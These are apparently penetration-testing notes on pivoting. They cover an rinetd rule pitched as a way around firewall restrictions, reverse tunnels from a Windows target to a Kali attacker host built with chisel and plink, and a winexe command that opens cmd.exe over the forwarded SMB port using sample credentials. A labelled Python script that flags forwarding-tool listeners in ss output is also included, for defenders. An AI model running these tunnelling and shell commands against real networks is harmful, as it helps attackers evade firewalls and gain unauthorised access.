Main Concept: Accept traffic on a given IP and port, then redirect it to another IP and port
Scenario
A Windows box wants to connect to an external device using RDP, but firewall restrictions prevent it.
We can set up a proxy on a Linux box to bypass this:
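vi /etc/rinetd.conf
# (ADD) a forwarding rule in the form: bindaddress bindport connectaddress connectport
# bindaddress = local/public IP on Kali (208.88.127.99), connectaddress = external IP we want to connect to
208.88.127.99 80 EXTERNAL_IP 3389
/etc/init.d/rinetd restart
# From Windows, connect with RDP to 208.88.127.99:80; rinetd forwards the connection to the external IP on port 3389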
Investigate sockets running on the target
ss -tulpn
-t: Display TCP sockets
-u: Display UDP sockets
-l: Displays only listening sockets
-p: Shows the process using the socket
-n: Doesn't resolve service names
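Added example (not part of the original notes): a Python parser for ss -tulpn output that flags listeners owned by the forwarding tools named on this page (rinetd, chisel, plink) and sshd listeners on unexpected ports, which is how a plink/ssh -R forward shows up on the SSH server. The sample output is constructed, and the expectation that sshd listens only on port 22 is an assumption.

```python
import ipaddress
import re

# Tool names from this page, matched as substrings of the owning process name.
FORWARDERS = ("rinetd", "chisel", "plink")
SSHD_PORTS = {22}  # assumption: sshd is configured to listen on 22 only

# Constructed sample of ss -tulpn output (not captured from a real host).
SAMPLE = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53   0.0.0.0:*         users:(("systemd-resolve",pid=510,fd=13))
tcp   LISTEN 0      5      208.88.127.99:80   0.0.0.0:*         users:(("rinetd",pid=1402,fd=4))
tcp   LISTEN 0      4096   *:9002             *:*               users:(("chisel_linux",pid=2211,fd=6))
tcp   LISTEN 0      128    127.0.0.1:445      0.0.0.0:*         users:(("sshd",pid=3050,fd=9))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=700,fd=4))
tcp   LISTEN 0      244    127.0.0.1:5432     0.0.0.0:*
"""

def is_loopback(addr):
    addr = addr.strip("[]").split("%")[0]   # drop IPv6 brackets and %iface scope
    if addr == "*":
        return False                        # wildcard bind: every interface
    return ipaddress.ip_address(addr).is_loopback

def audit(ss_output):
    """Return (proto, addr, port, process, reasons) for each listener worth reviewing."""
    findings = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split(None, 6)
        if len(fields) < 6:
            continue
        addr, port = fields[4].rsplit(":", 1)
        # The Process column is empty when ss lacks the privileges to see the owner.
        procs = re.findall(r'\("([^"]+)",pid=\d+', fields[6]) if len(fields) > 6 else []
        reasons = []
        for name in procs:
            if any(tool in name.lower() for tool in FORWARDERS):
                reasons.append("forwarding tool")
            # An sshd-owned listener on another port is how an ssh/plink -R forward appears.
            if name == "sshd" and int(port) not in SSHD_PORTS:
                reasons.append("sshd remote forward")
        if not procs and not is_loopback(addr):
            reasons.append("exposed, owner unknown")
        if reasons:
            findings.append((fields[0], addr, int(port), ",".join(procs) or "?", reasons))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

On a live host, pass it the output of ss -tulpn run as root so the Process column is populated.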
Chisel
### On Windows Target ###
chisel_windows.exe client KALI_IP_BOX:9002 R:14147:localhost:14147
### On Kali ###
./chisel_linux server --reverse --port 9002
plink
On Target:
.\plink.exe root@KALI_IP -R 445:127.0.0.1:445
On Kali:
winexe -U 'admin%password123' //127.0.0.1 cmd.exe